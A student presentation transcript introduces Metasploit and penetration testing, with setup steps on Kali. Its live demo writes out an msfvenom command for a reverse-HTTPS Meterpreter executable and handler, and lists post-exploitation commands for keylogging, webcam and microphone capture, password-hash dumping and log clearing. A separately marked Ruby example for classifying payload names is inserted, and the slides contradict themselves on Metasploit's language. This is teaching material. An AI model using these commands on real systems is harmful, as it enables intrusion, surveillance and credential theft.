Laura Jaideny Pérez Gómez - A

Presentation transcript:

Laura Jaideny Pérez Gómez - A01271904
Kevin Geis - A01678014
Arturo Ocampo Pérez - A01271806
Artur Eichler - A01676637

Structure
- History
- Facts and figures
- What is penetration testing?
- What is Metasploit?
- Why and when to use?
- How to use Metasploit in Kali Linux
- Live demo
- Conclusion

History
- 2003: first created by HD Moore
  - Portable network tool using Perl
- 2007: rewritten in Ruby
  - 18 months and 150,000 new lines of code needed
- 2009: acquired by Rapid7
  - GUI
  - More and faster updates
  - Increase of service
  - Start of the paid service

Facts & figures

What is penetration testing?
- Main goal is to attack your own IT system
- Safely simulate an attack and uncover exposures
- Solutions provide a virtual map
- Deep understanding is needed to simulate a real attack efficiently
- Penetration testing tools allow tactics to be simulated in hours

Penetration testing
- Identifies target systems and a particular goal
- Target: white box or black box
- Suggests recommendations to reduce risk
- Simplified as two parts:
  - Discover vulnerabilities
  - Exploit the vulnerabilities
- Defenses were sufficient
- Vulnerable to attack
- Defenses the test defeated

Penetration testing
- In 2012, 80% of IT companies reported at least one security breach
- Penetration testing:
  - Identify vulnerabilities
  - Validate existing controls
  - Develop guidelines for remediation
  - Maintain information security controls
  - Save thousands of dollars
  - Prevent damage to reputation and consumer confidence
  - Avoid business disruptions

What is Metasploit?
- Computer security project
- Open source tool
- Develop exploits, payloads and encoders
- Design and develop tools for reconnaissance, exploitation and post-exploitation

What is Metasploit?
- It was written in Perl Scripting Language
- Dual-licensed product
- Competes with Immunity CANVAS and Security IMPACT
- It is well-known for its anti-forensic and evasion tools

Why use Metasploit?
- Powerful tool
- Enables exploits to be written easily
- It can test with different platforms

When to use Metasploit?
- System administrators
  - Administrators do not know if their system is vulnerable to a given exploit
  - Administrators can check multiple servers
- Build newer and more powerful security testing tools

How to use Metasploit in Kali?
Simple steps:
1. Choosing and configuring an exploit
2. Choosing and configuring the payload (encode to prevent IPS detection)
3. Execute the exploit

How to use Metasploit in Kali?
Framework is modular, allowing the combination of any exploit with any payload
- Payload
- Exploit for a Vulnerability

How to use Metasploit in Kali?
Payloads
- 2 main categories: Inline (Single) and Staged
- Inline: self-contained and completely stand-alone; no further download from the attacker is needed to run the payload (bigger in file size)
- Staged: creates a network connection between the attacker and victim and loads the rest of the payload onto the victim's machine (smaller in file size)
- Shell_Bind_tcp, Shell_Reverse_tcp, Meterpreter

How to use Metasploit in Kali?
Payloads
   linux/x64/shell/bind_tcp                 Linux Command Shell, Bind TCP Stager
   linux/x64/shell/reverse_tcp              Linux Command Shell, Reverse TCP Stager
   linux/x64/shell_bind_tcp                 Linux Command Shell, Bind TCP Inline
   linux/x64/shell_reverse_tcp              Linux Command Shell, Reverse TCP Inline
   windows/x64/shell/bind_tcp               Windows x64 Command Shell, Bind TCP Stager
   windows/x64/shell/reverse_tcp            Windows x64 Command Shell, Reverse TCP Stager
   windows/x64/shell_bind_tcp               Windows x64 Command Shell, Bind TCP Inline
   windows/x64/shell_reverse_tcp            Windows x64 Command Shell, Reverse TCP Inline
=> windows/x64/meterpreter_reverse_https    Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
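The naming pattern in the list above separates staged payloads (stage and stager as two path segments) from inline ones (joined by an underscore), and the bind/reverse part of the name gives the connection direction. The following is an added example, not part of the original slides and not Metasploit code, that reads those two properties out of a payload name seen in a test report or alert so a defender knows what network behaviour to look for. The function names, the `PayloadInfo` struct and the `KNOWN_ARCHES` list are assumptions, and only the `platform/arch/...` name shapes shown on the slide are handled.

```ruby
# Added example, not Metasploit code: classify payload names using the naming
# pattern visible in the slide's list. KNOWN_ARCHES is an assumed, partial list.
KNOWN_ARCHES = %w[x64 x86 armle aarch64 mipsle mipsbe].freeze

PayloadInfo = Struct.new(:platform, :arch, :kind, :stage, :transport, :direction)

def classify_payload(name)
  parts = name.strip.split('/').reject(&:empty?) # tolerates a doubled slash
  raise ArgumentError, "not a payload name: #{name.inspect}" if parts.size < 2

  platform = parts.shift
  arch = KNOWN_ARCHES.include?(parts.first) ? parts.shift : nil
  case parts.size
  when 1 # inline: stage and transport joined by "_" in a single segment
    kind = :inline
    m = parts[0].match(/\A(.+?)_((?:bind|reverse)_.+)\z/)
    stage, transport = m ? [m[1], m[2]] : [parts[0], nil]
  when 2 # staged: stage and stager are separate path segments
    kind = :staged
    stage, transport = parts
  else
    raise ArgumentError, "unexpected payload name shape: #{name.inspect}"
  end
  direction = transport && transport[/\A(bind|reverse)_/, 1]&.to_sym
  PayloadInfo.new(platform, arch, kind, stage, transport, direction)
end

# What a defender should expect on the wire for a given payload name.
def network_expectation(info)
  first = case info.direction
          when :bind    then 'listener opens on the target, connection comes in to it'
          when :reverse then 'target connects outbound to the listening host (LHOST)'
          else 'direction is not encoded in the name'
          end
  second = if info.kind == :staged
             'the rest of the payload is then loaded over that connection'
           else
             'no further payload download is needed'
           end
  "#{first}; #{second}"
end

# Constructed sample input: two names taken from the slide's list.
if __FILE__ == $PROGRAM_NAME
  %w[linux/x64/shell/bind_tcp windows/x64/meterpreter_reverse_https].each do |n|
    puts "#{n}: #{network_expectation(classify_payload(n))}"
  end
end
```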

How to use Metasploit in Kali?
- Metasploit Framework and Metasploit Pro are preinstalled in Kali Linux
- Start PostgreSQL and enable start at boot time
- Initialise Metasploit Database

root@kali:~# service postgresql start
root@kali:~# update-rc.d postgresql enable
root@kali:~# msfdb init

How to use Metasploit in Kali?
Metasploit User Interfaces
- msfconsole: interactive console interface (most common)
- msfcli: deprecated command line interface
- armitage: a third-party add-on GUI to the MSF

Live demo
- Creating Reverse HTTPS - Meterpreter payload
- Using Multi Handler inside Metasploit Framework

root@kali:~# msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.80.128 LPORT=443 -f exe > reverse_https.exe
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter_reverse_https
msf exploit(handler) > set LHOST 192.168.80.128
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit

Live demo
Meterpreter commands
   download    Download a file or directory
   upload      Upload a file or directory
   arp         Display the host ARP cache
   route       View and modify the routing table
   clearev     Clear the event log
   execute     Execute a command
   kill        Terminate a process
   pkill       Terminate processes by name
   ps          List running processes
   reboot      Reboots the remote computer
   reg         Modify and interact with the remote registry
   shell       Drop into a system command shell
   shutdown    Shuts down the remote computer

Live demo
Meterpreter commands
   sysinfo                                    Gets information about the remote system, such as OS
   keyscan_dump                               Dump the keystroke buffer
   keyscan_start                              Start capturing keystrokes
   keyscan_stop                               Stop capturing keystrokes
   screenshot                                 Grab a screenshot of the interactive desktop
   uictl [enable/disable] [keyboard/mouse]    Enable/disable mouse/keyboard
   record_mic -d <sec>                        Record audio from the default microphone for X seconds
   webcam_chat                                Start a video chat
   webcam_list                                List webcams
   webcam_snap                                Take a snapshot from the specified webcam
   webcam_stream                              Play a video stream from the specified webcam
   hashdump                                   Dumps the contents of the SAM database

Conclusion
- More than just running exploits across a large range of networks and target machines
- Having the ability to automate what happens after a successful exploitation
- Vulnerability scanners don’t actually seize control of a host
- Anything done post-exploitation
- Metasploit Toolkit

Sources
- Maynor, D., et al. (2007). Metasploit Toolkit. USA: Syngress
- http://meuslivros.github.io/metasploit/OEBPS/pr04s03.html
- https://www.rapid7.com/products/metasploit/download/editions/
- https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
- https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
- https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/
- https://en.wikipedia.org/wiki/Penetration_test
- http://spiresolutions.com/solutions/penetration-testing/
- https://www.dataart.com/services/security-testing/penetration-testing